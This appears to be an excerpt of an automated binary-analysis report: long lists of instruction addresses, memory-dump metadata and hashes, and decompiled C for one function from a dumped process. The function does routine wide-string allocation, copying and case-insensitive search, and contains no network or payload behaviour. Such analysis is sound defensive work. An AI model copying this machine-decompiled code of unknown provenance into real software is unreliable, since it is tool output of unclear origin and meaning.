0x003b93eb
0x003b93eb
0x003b93ed
0x003b93ef
0x003b93f1
0x00000000
0x003b93f1
0x003b9351
0x003b9351
0x003b93f4
0x003b93f4
0x003b93f6
0x003b93f8
0x003b93f8
0x003b93fa
0x003b93fa
0x003b93fe
0x003b93fe
0x003b9404
0x003b9406
0x00000000
0x00000000
0x003b9408
0x003b940e
0x003b9410
0x00000000
0x00000000
0x00000000
0x003b9410
0x003b93fa
0x003b9412
0x003b9412
0x003b9414
0x003b941d
0x00000000
0x00000000
0x003b9416
0x003b9416
0x003b941f
0x003b941f
0x003b941f
0x003b9421
0x003b9421
0x003b9424
0x003b9426
0x00000000
0x00000000
0x003b9428
0x003b9429
0x003b942c
0x003b942f
0x003b9432
0x003b9434
0x00000000
0x00000000
0x00000000
0x003b9434
0x003b9421
0x003b9436
0x003b9436
0x003b9438
0x003b9438
0x003b934b
0x003b933d
0x003b9339
0x003b9235
0x003b9181
0x003b90f9
0x003b943b
0x003b943b
0x003b9440
0x003b9442
0x003b9445
0x003b9447
0x003b95af
0x003b95af
0x003b95b9
0x003b95bb
0x003b95c1
0x003b95c3
0x003b95c5
0x003b95ff
0x003b9601
0x003b95c7
0x003b95c7
0x003b95c9
0x003b95cb
0x003b95ce
0x003b95d1
0x003b95d3
0x003b95d5
0x003b95d5
0x003b95d7
0x003b95d7
0x003b95d8
0x003b95dd
0x003b95e2
0x003b95e4
0x00000000
0x00000000
0x003b95e6
0x003b95ea
0x003b95ee
0x003b95f0
0x00000000
0x00000000
0x00000000
0x003b95f0
0x003b95d7
0x003b95d3
0x003b95f2
0x003b95f2
0x003b95f4
0x003b95f5
0x003b95fa
0x003b95fa
0x003b9604
0x003b9607
0x003b9609
0x003b944d
0x003b944d
0x003b9450
0x003b9452
0x00000000
0x003b9458
0x003b945a
0x003b945a
0x003b945d
0x003b947a
0x003b947e
0x003b948a
0x003b948a
0x003b9490
0x003b9490
0x003b9495
0x003b9499
0x003b949d
0x003b949f
0x00000000
0x00000000
0x003b94a5
0x003b94a8
0x003b94aa
0x00000000
0x003b94ac
0x003b94ac
0x003b94b2
0x00000000
0x00000000
0x00000000
0x00000000
0x003b94b2
0x00000000
0x003b94aa
0x003b969a
0x003b969f
0x003b945f
0x003b945f
0x003b9461
0x003b9464
0x003b94b4
0x003b94b4
0x003b94b8
0x003b94ba
0x00000000
0x00000000
0x003b94bc
0x003b94bd
0x003b94c3
0x00000000
0x003b94c5
0x003b94c5
0x003b94c5
0x003b94c5
0x00000000
0x003b94c3
0x003b9466
0x003b946b
0x003b946b
0x003b946d
0x003b946d
0x003b9471
0x003b9473
0x00000000
0x00000000
0x003b9475
0x003b9476
0x003b9478
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b9478
0x003b946d
0x003b9464
0x003b94ca
0x003b94cf
0x003b94cf
0x003b94d2
0x003b94d5
0x003b94d8
0x003b94da
0x003b94ed
0x003b94f0
0x003b94f0
0x003b94f6
0x003b94fe
0x003b94fe
0x003b94fe
0x003b94ff
0x003b9509
0x003b9510
0x003b9511
0x003b9514
0x003b9519
0x003b951f
0x003b9521
0x003b9523
0x003b956d
0x003b956f
0x003b9525
0x003b9525
0x003b9527
0x003b9529
0x003b952c
0x003b952f
0x003b9531
0x003b9533
0x003b9537
0x003b9537
0x003b9539
0x003b9539
0x003b953a
0x003b953f
0x003b9544
0x003b9546
0x00000000
0x00000000
0x003b9548
0x003b954c
0x003b9550
0x003b9552
0x00000000
0x00000000
0x00000000
0x003b9552
0x003b9554
0x003b9554
0x003b9531
0x003b9558
0x003b955a
0x003b955b
0x003b955f
0x003b9564
0x003b9568
0x003b9568
0x003b9572
0x003b9575
0x003b9578
0x003b94dc
0x003b94dc
0x003b94dc
0x003b957a
0x003b957c
0x003b957e
0x003b9584
0x003b9586
0x003b958c
0x003b9596
0x003b9596
0x003b9599
0x003b959a
0x003b959d
0x003b959f
0x00000000
0x00000000
0x003b95a1
0x003b95a3
0x003b9691
0x00000000
0x00000000
0x00000000
0x00000000
0x003b95a9
0x003b95a9
0x003b95ab
0x003b9590
0x003b9593
0x003b9593
0x00000000
0x003b9593
0x00000000
0x003b95ab
0x003b9596
0x003b9586
0x003b957e
0x003b9452
0x003b9610
0x003b9610
0x003b9612
0x003b9613
0x003b9624
0x003b9624
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37423c9d46a7c914545311d6de0227cd52b085ee836e5e2d8b0d06f668941822
Instruction ID: 8efe3d0c93786cd74a535b2b054dabd3e4213028878fbb4909cdf16198221738
Opcode Fuzzy Hash: 37423c9d46a7c914545311d6de0227cd52b085ee836e5e2d8b0d06f668941822
Instruction Fuzzy Hash: 69225971A1071286DB228F3DC8403B672E6AFD5358B2A872BEB55CBA94FB35CC41C341

Uniqueness

Uniqueness Score: -1.00%

Function 003BD980, Relevance: .6, Instructions: 612
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E003BD980(signed int* __ecx, signed int* _a4, signed short _a8) {
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int* _v36;
				intOrPtr _v40;
				signed int* _v44;
				signed int _t170;
				signed int _t171;
				signed int _t176;
				signed int _t177;
				unsigned int _t183;
				unsigned int _t191;
				signed int _t192;
				signed int* _t194;
				signed int _t196;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				unsigned int _t207;
				unsigned int _t220;
				signed int _t225;
				signed int _t226;
				signed int _t230;
				signed int _t231;
				unsigned int _t237;
				signed int _t238;
				signed int _t240;
				signed short* _t243;
				signed short** _t244;
				unsigned int _t249;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				signed short* _t257;
				signed int _t258;
				signed int _t259;
				signed int _t261;
				signed int _t268;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed short* _t282;
				signed int _t286;
				signed int _t289;
				signed int _t290;
				void* _t297;
				signed int _t299;
				signed int _t300;
				signed int _t308;
				signed int* _t314;
				signed int _t315;
				signed int _t320;
				signed short* _t323;
				signed int _t327;
				signed int _t329;
				signed int _t330;
				signed short* _t335;
				void* _t338;
				signed int _t348;
				signed short* _t349;
				signed int _t352;
				signed int _t354;
				signed int _t355;
				signed short* _t356;
				signed short* _t357;
				signed int _t358;
				signed int* _t360;
				signed int _t366;
				signed int* _t369;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t375;
				signed int _t376;
				signed int* _t377;
				unsigned int _t379;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				unsigned int* _t389;
				unsigned int* _t390;
				unsigned int* _t394;

				_t389 = (_t387 & 0xfffffff0) - 0x14;
				_t346 = __ecx;
				_t170 = _a8 & 0x0000ffff;
				_t369 = _a4;
				if(_t170 != 0) {
					_t243 =  *__ecx;
					if(_t243 == 0) {
						L54:
						_push(0x10);
						 *_t369 = 1;
						_t171 = E003B1030();
						_push(8);
						_t369[1] = _t171;
						_t369[2] = 4;
						_t244 = E003B1030();
						_t390 =  &(_t389[2]);
						if(_t244 == 0) {
							_t244 = 0;
						} else {
							_t348 =  *_t346;
							 *_t244 = 0;
							_t244[1] = 0;
							if(_t348 == 0 || ( *_t348 & 0x0000ffff) == 0) {
								_push(0x80);
								_t349 = E003B1030();
								_t390 =  &(_t390[1]);
								_t282 =  *_t244;
								if(_t282 == 0) {
									 *_t349 = 0;
								} else {
									if(_t349 != 0) {
										_t176 =  *_t282 & 0x0000ffff;
										 *_t349 = _t176;
										if(_t176 != 0) {
											_t177 = 0;
											while(1) {
												_t177 = _t177 + 1;
												_t254 =  *(_t282 + _t177 * 4 - 2) & 0x0000ffff;
												 *(_t349 + _t177 * 4 - 2) = _t254;
												if(_t254 == 0) {
													goto L97;
												}
												_t255 =  *(_t282 + _t177 * 4) & 0x0000ffff;
												 *(_t349 + _t177 * 4) = _t255;
												if(_t255 != 0) {
													continue;
												}
												goto L97;
											}
										}
									}
									L97:
									_push(2);
									_push(_t282);
									E003B10B0();
									_t390 =  &(_t390[2]);
								}
								 *_t244 = _t349;
								_t244[1] = 0x40;
							} else {
								_t286 = _t348 & 0x0000000f;
								if(_t286 == 0) {
									L62:
									asm("pxor xmm0, xmm0");
									_t183 =  ~( ~_t286 + 0x00000007 & 0x00000007) + 0x7fffffff;
									_v28 = _t183;
									_t256 = _t183;
									while(1) {
										asm("movdqu xmm1, [edi+edx*2]");
										asm("pcmpeqw xmm1, xmm0");
										asm("pmovmskb eax, xmm1");
										if(_t183 != 0) {
											break;
										}
										_t286 = _t286 + 8;
										if(_t286 < _t256) {
											continue;
										} else {
											_v28 = _t256;
											if(_v28 >= 0x7fffffff) {
												goto L69;
											} else {
												goto L66;
											}
										}
										goto L70;
									}
									asm("bsf eax, eax");
									_v28 = (_t183 >> 1) + _t286;
								} else {
									_v28 = 0;
									if((_t286 & 0x00000001) != 0) {
										L66:
										_t196 = _v28;
										while(( *(_t348 + _t196 * 2) & 0x0000ffff) != 0) {
											_t196 = _t196 + 1;
											if(_t196 < 0x7fffffff) {
												continue;
											} else {
												L69:
												_v28 = 0x7fffffff;
											}
											goto L70;
										}
										_v28 = _t196;
									} else {
										_t286 =  ~_t286 + 0x10 >> 1;
										_t259 = _v28;
										while(( *(_t348 + _t259 * 2) & 0x0000ffff) != 0) {
											_t259 = _t259 + 1;
											if(_t259 < _t286) {
												continue;
											} else {
												goto L62;
											}
											goto L70;
										}
										_v28 = _t259;
									}
								}
								L70:
								_t289 =  <=  ? 0x40 : _v28 + 1;
								if(_t289 > 0) {
									_t191 = (_t289 >> 5 >> 0x1a) + _t289 >> 6;
									_t290 = _t289 & 0x8000003f;
									if(_t290 < 0) {
										_t290 = (_t290 - 0x00000001 | 0xffffffc0) + 1;
									}
									_t192 = _t191 + (0 | _t290 > 0x00000000);
									_v32 = _t192 << 6;
									_push(_t192 << 7);
									_t194 = E003B1030();
									_t390 =  &(_t390[1]);
									_t257 =  *_t244;
									if(_t257 == 0) {
										 *_t194 = 0;
									} else {
										if(_t194 != 0) {
											_t299 =  *_t257 & 0x0000ffff;
											 *_t194 = _t299;
											if(_t299 != 0) {
												_t300 = 0;
												while(1) {
													_t300 = _t300 + 1;
													_t372 =  *(_t257 + _t300 * 4 - 2) & 0x0000ffff;
													 *(_t194 + _t300 * 4 - 2) = _t372;
													if(_t372 == 0) {
														break;
													}
													_t373 =  *(_t257 + _t300 * 4) & 0x0000ffff;
													_t194[_t300] = _t373;
													if(_t373 != 0) {
														continue;
													}
													break;
												}
												_t369 = _a4;
											}
										}
										_push(2);
										_push(_t257);
										_v36 = _t194;
										E003B10B0();
										_t194 = _v36;
										_t390 =  &(_t390[2]);
									}
									_t244[1] = _v32;
									 *_t244 = _t194;
								} else {
									_t194 = 0;
								}
								if(_t194 != 0) {
									_t371 = _v28;
									_t297 = 0;
									while(1) {
										_t258 =  *_t348 & 0x0000ffff;
										_t297 = _t297 + 1;
										 *_t194 = _t258;
										if(_t371 != 0 && _t297 == _t371) {
											break;
										}
										if(_t258 == 0) {
											_t369 = _a4;
										} else {
											_t194 =  &(_t194[0]);
											_t348 = _t348 + 2;
											continue;
										}
										goto L101;
									}
									_t369 = _a4;
									_t194[0] = 0;
								}
							}
						}
						L101:
						 *(_t369[1]) = _t244;
						return _t369;
					} else {
						_t51 = _t170 + 0x20; // 0x3bd068
						_t198 =  <=  ? _t51 : _t170;
						_t261 = ( <=  ? _t51 : _t170) & 0x0000ffff;
						if(( *_t243 & 0x0000ffff) == 0) {
							goto L54;
						} else {
							_v36 = __ecx;
							_t308 = 0;
							while(1) {
								_t55 = (_t243[_t308] & 0x0000ffff) + 0x20; // 0x20
								_t351 =  <=  ? _t55 : _t243[_t308] & 0x0000ffff;
								__eflags = ( <=  ? _t55 : _t243[_t308] & 0x0000ffff) - _t261;
								if(( <=  ? _t55 : _t243[_t308] & 0x0000ffff) == _t261) {
									break;
								}
								_t308 = _t308 + 1;
								if((_t243[_t308] & 0x0000ffff) != 0) {
									continue;
								} else {
									_t369 = _a4;
									_t346 = _v36;
									goto L54;
								}
								goto L150;
							}
							_t369 = _a4;
							_t200 = _t308 + _t308;
							_t346 = _v36;
							if( &(_t243[_t308]) == 0) {
								goto L54;
							} else {
								_v36 = 0;
								_v32 = 0;
								_v28 = 0;
								_t201 = _t200 >> 1;
								if(0 != 0) {
									_v24 = _t261;
									_t352 = _t201;
									_t375 = 0;
									L115:
									if(( *_t243 & 0x0000ffff) == 0) {
										_push(0x80);
										_t202 = E003B1030();
										_t389 =  &(_t389[1]);
										 *_t202 = _t375;
									} else {
										_t125 = _t352 + 1; // -64
										_t271 =  <=  ? 0x40 : _t125;
										if(_t271 <= 0) {
											_t202 = _t375;
										} else {
											_t220 = (_t271 >> 5 >> 0x1a) + _t271 >> 6;
											_t272 = _t271 & 0x8000003f;
											if(_t272 < 0) {
												_t272 = (_t272 - 0x00000001 | 0xffffffc0) + 1;
											}
											_push(_t220 + (_t375 & 0xffffff00 | _t272 > 0x00000000) << 7);
											_t202 = E003B1030();
											_t389 =  &(_t389[1]);
											 *_t202 = _t375;
											if(_t243 != 0) {
												_t320 = _t375;
												while(1) {
													_t320 = _t320 + 1;
													_t273 =  *(_t243 + _t320 * 2 - 2) & 0x0000ffff;
													 *(_t202 + _t320 * 2 - 2) = _t273;
													if(_t320 == _t352) {
														break;
													}
													if(_t273 != 0) {
														continue;
													} else {
													}
													goto L126;
												}
												 *(_t202 + _t320 * 2) = _t375;
											}
										}
									}
									L126:
									_t376 = _t202;
								} else {
									_v24 = _t261;
									_t352 = _t201;
									L113:
									_push(0x80);
									_t376 = E003B1030();
									_t389 =  &(_t389[1]);
									 *_t376 = 0;
								}
								E003BE0A0( &_v36, _t376, _v36);
								_push(2);
								_push(_t376);
								E003B10B0();
								_t389 =  &(_t389[2]);
								_t243 = _t243 + 2 + _t352 * 2;
								if(_t243 != 0 && ( *_t243 & 0x0000ffff) != 0) {
									_t315 = 0;
									while(1) {
										_t315 = _t315 + 1;
										_t356 =  &(_t243[_t315]);
										_t268 =  *(_t356 - 2) & 0x0000ffff;
										_t269 =  <=  ? _t268 + 0x20 : _t268;
										__eflags = ( <=  ? _t268 + 0x20 : _t268) - _v24;
										if(( <=  ? _t268 + 0x20 : _t268) == _v24) {
											break;
										}
										if((_t243[_t315] & 0x0000ffff) != 0) {
											continue;
										}
										goto L132;
									}
									_t357 =  &(_t356[0xffffffffffffffff]);
									if(_t357 == 0) {
										goto L132;
									} else {
										_t358 = _t357 - _t243;
										_t352 = _t358 >> 1;
										if(_t358 == 0) {
											goto L113;
										} else {
											_t375 = 0;
											goto L115;
										}
										L144:
										_push(4);
										_push(_t314);
										E003B10B0();
										_v32 = 0;
										return _t377;
									}
									goto L150;
								}
								L132:
								_t377 = _a4;
								E003BE0A0( &_v36, _t243, _v36);
								 *_t377 = 0;
								 *((intOrPtr*)(_t377 + 4)) = 0;
								 *((intOrPtr*)(_t377 + 8)) = 0;
								E003BE3F0(_t377, _t389);
								_t207 =  *_t389;
								 *_t389 = 0;
								_v40 = 0;
								_t314 = _v44;
								if(_t207 > 0) {
									_t249 = _t207 >> 1;
									if(_t249 == 0) {
										_t354 = 1;
									} else {
										_t355 = 0;
										_t379 = _t207;
										do {
											_t266 =  *((intOrPtr*)(_t314 + _t355 * 8));
											if( *((intOrPtr*)(_t314 + _t355 * 8)) != 0) {
												_push(1);
												E003B87E0(_t266);
												_t314 = _v36;
											}
											_t267 =  *((intOrPtr*)(_t314 + 4 + _t355 * 8));
											if( *((intOrPtr*)(_t314 + 4 + _t355 * 8)) != 0) {
												_push(1);
												E003B87E0(_t267);
												_t314 = _v36;
											}
											_t355 = _t355 + 1;
										} while (_t355 < _t249);
										_t207 = _t379;
										_t354 = _t355 + _t355 + 1;
										_t377 = _a4;
									}
									_t162 = _t354 - 1; // 0x0
									if(_t162 < _t207) {
										_t265 =  *((intOrPtr*)(_t314 + _t354 * 4 - 4));
										if( *((intOrPtr*)(_t314 + _t354 * 4 - 4)) != 0) {
											_push(1);
											E003B87E0(_t265);
											_t314 = _v36;
										}
									}
								}
								goto L144;
							}
						}
					}
				} else {
					_push(0x10);
					 *_t369 = 1;
					_t225 = E003B1030();
					_push(8);
					_t369[1] = _t225;
					_t369[2] = 4;
					_t226 = E003B1030();
					_t251 = _t226;
					_t394 =  &(_t389[2]);
					if(_t251 == 0) {
						_t251 = 0;
					} else {
						_t276 =  *__ecx;
						 *_t251 = 0;
						 *(_t251 + 4) = 0;
						if(_t276 == 0 || ( *_t276 & 0x0000ffff) == 0) {
							_push(0x80);
							_t360 = E003B1030();
							_t394 =  &(_t394[1]);
							_t323 =  *_t251;
							if(_t323 == 0) {
								 *_t360 = 0;
							} else {
								if(_t360 != 0) {
									_t230 =  *_t323 & 0x0000ffff;
									 *_t360 = _t230;
									if(_t230 != 0) {
										_t231 = 0;
										while(1) {
											_t231 = _t231 + 1;
											_t277 =  *(_t323 + _t231 * 4 - 2) & 0x0000ffff;
											 *(_t360 + _t231 * 4 - 2) = _t277;
											if(_t277 == 0) {
												goto L43;
											}
											_t278 =  *(_t323 + _t231 * 4) & 0x0000ffff;
											_t360[_t231] = _t278;
											if(_t278 != 0) {
												continue;
											}
											goto L43;
										}
									}
								}
								L43:
								_push(2);
								_push(_t323);
								E003B10B0();
								_t394 =  &(_t394[2]);
							}
							 *_t251 = _t360;
							 *(_t251 + 4) = 0x40;
						} else {
							_t327 = _t276 & 0x0000000f;
							if(_t327 == 0) {
								L9:
								asm("pxor xmm0, xmm0");
								_t366 =  ~( ~_t327 + 0x00000007 & 0x00000007) + 0x7fffffff;
								while(1) {
									asm("movdqu xmm1, [ecx+edx*2]");
									asm("pcmpeqw xmm1, xmm0");
									asm("pmovmskb eax, xmm1");
									if(_t226 != 0) {
										break;
									}
									_t327 = _t327 + 8;
									if(_t327 < _t366) {
										continue;
									} else {
										if(_t366 >= 0x7fffffff) {
											goto L15;
										} else {
											goto L13;
										}
									}
									goto L16;
								}
								asm("bsf edi, eax");
								_t366 = (_t366 >> 1) + _t327;
							} else {
								_t366 = 0;
								if((_t327 & 0x00000001) != 0) {
									L13:
									while(( *(_t276 + _t366 * 2) & 0x0000ffff) != 0) {
										_t366 = _t366 + 1;
										if(_t366 < 0x7fffffff) {
											continue;
										} else {
											L15:
											_t366 = 0x7fffffff;
										}
										goto L16;
									}
								} else {
									_t327 =  ~_t327 + 0x10 >> 1;
									while(1) {
										_t226 =  *(_t276 + _t366 * 2) & 0x0000ffff;
										if(_t226 == 0) {
											goto L16;
										}
										_t366 = _t366 + 1;
										if(_t366 < _t327) {
											continue;
										} else {
											goto L9;
										}
										goto L16;
									}
								}
							}
							L16:
							_t12 = _t366 + 1; // 0x80000000
							_t329 =  <=  ? 0x40 : _t12;
							if(_t329 > 0) {
								_t237 = (_t329 >> 5 >> 0x1a) + _t329 >> 6;
								_t330 = _t329 & 0x8000003f;
								if(_t330 < 0) {
									_t330 = (_t330 - 0x00000001 | 0xffffffc0) + 1;
								}
								_t238 = _t237 + (0 | _t330 > 0x00000000);
								_v28 = _t238 << 6;
								_push(_t238 << 7);
								_v32 = _t276;
								_t240 = E003B1030();
								_t276 = _v32;
								_t394 =  &(_t394[1]);
								_t335 =  *_t251;
								if(_t335 == 0) {
									 *_t240 = 0;
								} else {
									if(_t240 != 0) {
										_t384 =  *_t335 & 0x0000ffff;
										 *_t240 = _t384;
										_t369 = _a4;
										if(_t384 != 0) {
											_v36 = 0;
											_v32 = _t276;
											_t279 = _v36;
											while(1) {
												_t279 = _t279 + 1;
												_t385 =  *(_t335 + _t279 * 4 - 2) & 0x0000ffff;
												 *(_t240 + _t279 * 4 - 2) = _t385;
												if(_t385 == 0) {
													break;
												}
												_t386 =  *(_t335 + _t279 * 4) & 0x0000ffff;
												 *(_t240 + _t279 * 4) = _t386;
												if(_t386 != 0) {
													continue;
												}
												break;
											}
											_t276 = _v32;
											_t369 = _a4;
										}
									}
									_push(2);
									_push(_t335);
									_v36 = _t240;
									_v32 = _t276;
									E003B10B0();
									_t276 = _v32;
									_t240 = _v36;
									_t394 =  &(_t394[2]);
								}
								 *(_t251 + 4) = _v28;
								 *_t251 = _t240;
							} else {
								_t240 = 0;
							}
							if(_t240 != 0) {
								_t338 = 0;
								while(1) {
									_t383 =  *_t276 & 0x0000ffff;
									_t338 = _t338 + 1;
									 *_t240 = _t383;
									if(_t366 != 0 && _t338 == _t366) {
										break;
									}
									if(_t383 == 0) {
										_t369 = _a4;
									} else {
										_t240 = _t240 + 2;
										_t276 = _t276 + 2;
										continue;
									}
									goto L47;
								}
								_t369 = _a4;
								 *(_t240 + 2) = 0;
							}
						}
					}
					L47:
					 *(_t369[1]) = _t251;
					return _t369;
				}
				L150:
			}

0x003bd989
0x003bd98c
0x003bd98e
0x003bd992
0x003bd997
0x003bdbc7
0x003bdbcb
0x003bdc10
0x003bdc10
0x003bdc12
0x003bdc18
0x003bdc1d
0x003bdc1f
0x003bdc22
0x003bdc2e
0x003bdc30
0x003bdc35
0x003bde2d
0x003bdc3b
0x003bdc3b
0x003bdc3f
0x003bdc41
0x003bdc46
0x003bddd0
0x003bddda
0x003bdddc
0x003bdddf
0x003bdde3
0x003bde1f
0x003bdde5
0x003bdde7
0x003bdde9
0x003bddec
0x003bddf1
0x003bddf3
0x003bddf5
0x003bddf5
0x003bddf6
0x003bddfb
0x003bde02
0x00000000
0x00000000
0x003bde04
0x003bde08
0x003bde0e
0x00000000
0x00000000
0x00000000
0x003bde0e
0x003bddf5
0x003bddf1
0x003bde10
0x003bde10
0x003bde12
0x003bde13
0x003bde18
0x003bde18
0x003bde22
0x003bde24
0x003bdc57
0x003bdc59
0x003bdc5c
0x003bdc87
0x003bdc8b
0x003bdc97
0x003bdc9c
0x003bdca0
0x003bdca2
0x003bdca2
0x003bdca7
0x003bdcab
0x003bdcb1
0x00000000
0x00000000
0x003bdcb7
0x003bdcbc
0x00000000
0x003bdcbe
0x003bdcbe
0x003bdcca
0x00000000
0x00000000
0x00000000
0x00000000
0x003bdcca
0x00000000
0x003bdcbc
0x003bde86
0x003bde8d
0x003bdc5e
0x003bdc5e
0x003bdc69
0x003bdccc
0x003bdccc
0x003bdcd0
0x003bdcdc
0x003bdce2
0x00000000
0x003bdce4
0x003bdce4
0x003bdce4
0x003bdce4
0x00000000
0x003bdce2
0x003bde7d
0x003bdc6b
0x003bdc70
0x003bdc72
0x003bdc76
0x003bdc82
0x003bdc85
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003bdc85
0x003bde64
0x003bde64
0x003bdc69
0x003bdcec
0x003bdcfb
0x003bdd00
0x003bdd13
0x003bdd16
0x003bdd1c
0x003bdd24
0x003bdd24
0x003bdd2f
0x003bdd39
0x003bdd3d
0x003bdd3e
0x003bdd43
0x003bdd46
0x003bdd4a
0x003bdd91
0x003bdd4c
0x003bdd4e
0x003bdd50
0x003bdd53
0x003bdd58
0x003bdd5a
0x003bdd5c
0x003bdd5c
0x003bdd5d
0x003bdd62
0x003bdd69
0x00000000
0x00000000
0x003bdd6b
0x003bdd6f
0x003bdd75
0x00000000
0x00000000
0x00000000
0x003bdd75
0x003bdd77
0x003bdd77
0x003bdd58
0x003bdd7a
0x003bdd7c
0x003bdd7d
0x003bdd81
0x003bdd86
0x003bdd8a
0x003bdd8a
0x003bdd98
0x003bdd9b
0x003bdd02
0x003bdd02
0x003bdd02
0x003bdd9f
0x003bdda5
0x003bdda9
0x003bddb3
0x003bddb3
0x003bddb6
0x003bddb7
0x003bddbc
0x00000000
0x00000000
0x003bddc8
0x003bde78
0x003bddce
0x003bddad
0x003bddb0
0x00000000
0x003bddb0
0x00000000
0x003bddc8
0x003bde6f
0x003bde72
0x003bde72
0x003bdd9f
0x003bdc46
0x003bde2f
0x003bde34
0x003bde3f
0x003bdbcd
0x003bdbd3
0x003bdbd6
0x003bdbd9
0x003bdbe1
0x00000000
0x003bdbe3
0x003bdbe3
0x003bdbe6
0x003bdbe8
0x003bdbf2
0x003bdbf5
0x003bdbf8
0x003bdbfb
0x00000000
0x00000000
0x003bdc01
0x003bdc08
0x00000000
0x003bdc0a
0x003bdc0a
0x003bdc0d
0x00000000
0x003bdc0d
0x00000000
0x003bdc08
0x003bde96
0x003bde99
0x003bde9c
0x003bdea4
0x00000000
0x003bdeaa
0x003bdeac
0x003bdeaf
0x003bdeb3
0x003bdeb7
0x003bdeb9
0x003bdeda
0x003bdede
0x003bdee0
0x003bdee2
0x003bdee7
0x003bdf52
0x003bdf57
0x003bdf5c
0x003bdf5f
0x003bdee9
0x003bdeee
0x003bdef4
0x003bdef9
0x003bdf4e
0x003bdefb
0x003bdf05
0x003bdf08
0x003bdf0e
0x003bdf16
0x003bdf16
0x003bdf23
0x003bdf24
0x003bdf29
0x003bdf2c
0x003bdf31
0x003bdf33
0x003bdf35
0x003bdf35
0x003bdf36
0x003bdf3b
0x003bdf42
0x00000000
0x00000000
0x003bdf4a
0x00000000
0x00000000
0x003bdf4c
0x00000000
0x003bdf4a
0x003be067
0x003be067
0x003bdf31
0x003bdef9
0x003bdf62
0x003bdf62
0x003bdebb
0x003bdebb
0x003bdebf
0x003bdec1
0x003bdec1
0x003bdecb
0x003bdecd
0x003bded2
0x003bded2
0x003bdf6c
0x003bdf71
0x003bdf73
0x003bdf74
0x003bdf79
0x003bdf7c
0x003bdf82
0x003bdf8b
0x003bdf8d
0x003bdf8d
0x003bdf8e
0x003bdf91
0x003bdfa2
0x003bdfa5
0x003bdfa8
0x00000000
0x00000000
0x003bdfb4
0x00000000
0x00000000
0x00000000
0x003bdfb4
0x003be077
0x003be07a
0x00000000
0x003be080
0x003be080
0x003be082
0x003be084
0x00000000
0x003be08a
0x003be08a
0x00000000
0x003be08a
0x003be046
0x003be046
0x003be048
0x003be049
0x003be051
0x003be064
0x003be064
0x00000000
0x003be07a
0x003bdfb6
0x003bdfb6
0x003bdfc1
0x003bdfce
0x003bdfd0
0x003bdfd3
0x003bdfd6
0x003bdfdb
0x003bdfe0
0x003bdfe3
0x003bdfe7
0x003bdfed
0x003bdff1
0x003bdff3
0x003be070
0x003bdff5
0x003bdff5
0x003bdff7
0x003bdff9
0x003bdff9
0x003bdffe
0x003be000
0x003be002
0x003be007
0x003be007
0x003be00b
0x003be011
0x003be013
0x003be015
0x003be01a
0x003be01a
0x003be01e
0x003be01f
0x003be023
0x003be025
0x003be029
0x003be029
0x003be02c
0x003be031
0x003be033
0x003be039
0x003be03b
0x003be03d
0x003be042
0x003be042
0x003be039
0x003be031
0x00000000
0x003bdfed
0x003bdea4
0x003bdbe1
0x003bd99d
0x003bd99d
0x003bd99f
0x003bd9a5
0x003bd9aa
0x003bd9ac
0x003bd9af
0x003bd9b6
0x003bd9bb
0x003bd9bd
0x003bd9c2
0x003bdbb2
0x003bd9c8
0x003bd9c8
0x003bd9cc
0x003bd9ce
0x003bd9d3
0x003bdb55
0x003bdb5f
0x003bdb61
0x003bdb64
0x003bdb68
0x003bdba4
0x003bdb6a
0x003bdb6c
0x003bdb6e
0x003bdb71
0x003bdb76
0x003bdb78
0x003bdb7a
0x003bdb7a
0x003bdb7b
0x003bdb80
0x003bdb87
0x00000000
0x00000000
0x003bdb89
0x003bdb8d
0x003bdb93
0x00000000
0x00000000
0x00000000
0x003bdb93
0x003bdb7a
0x003bdb76
0x003bdb95
0x003bdb95
0x003bdb97
0x003bdb98
0x003bdb9d
0x003bdb9d
0x003bdba7
0x003bdba9
0x003bd9e4
0x003bd9e6
0x003bd9e9
0x003bda06
0x003bda0a
0x003bda16
0x003bda1c
0x003bda1c
0x003bda21
0x003bda25
0x003bda2b
0x00000000
0x00000000
0x003bda31
0x003bda36
0x00000000
0x003bda38
0x003bda3e
0x00000000
0x00000000
0x00000000
0x00000000
0x003bda3e
0x00000000
0x003bda36
0x003bde58
0x003bde5d
0x003bd9eb
0x003bd9eb
0x003bd9f0
0x00000000
0x003bda40
0x003bda48
0x003bda4f
0x00000000
0x003bda51
0x003bda51
0x003bda51
0x003bda51
0x00000000
0x003bda4f
0x003bd9f2
0x003bd9f7
0x003bd9f9
0x003bd9f9
0x003bd9ff
0x00000000
0x00000000
0x003bda01
0x003bda04
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003bda04
0x003bd9f9
0x003bd9f0
0x003bda56
0x003bda5b
0x003bda61
0x003bda66
0x003bda79
0x003bda7c
0x003bda82
0x003bda8a
0x003bda8a
0x003bda95
0x003bda9f
0x003bdaa3
0x003bdaa4
0x003bdaa8
0x003bdaad
0x003bdab1
0x003bdab4
0x003bdab8
0x003bdb1a
0x003bdaba
0x003bdabc
0x003bdabe
0x003bdac1
0x003bdac6
0x003bdac9
0x003bdacb
0x003bdad2
0x003bdad6
0x003bdad9
0x003bdad9
0x003bdada
0x003bdadf
0x003bdae6
0x00000000
0x00000000
0x003bdae8
0x003bdaec
0x003bdaf2
0x00000000
0x00000000
0x00000000
0x003bdaf2
0x003bdaf4
0x003bdaf8
0x003bdaf8
0x003bdac9
0x003bdafb
0x003bdafd
0x003bdafe
0x003bdb02
0x003bdb06
0x003bdb0b
0x003bdb0f
0x003bdb13
0x003bdb13
0x003bdb21
0x003bdb24
0x003bda68
0x003bda68
0x003bda68
0x003bdb28
0x003bdb2e
0x003bdb38
0x003bdb38
0x003bdb3b
0x003bdb3c
0x003bdb41
0x00000000
0x00000000
0x003bdb4d
0x003bde50
0x003bdb53
0x003bdb32
0x003bdb35
0x00000000
0x003bdb35
0x00000000
0x003bdb4d
0x003bde44
0x003bde47
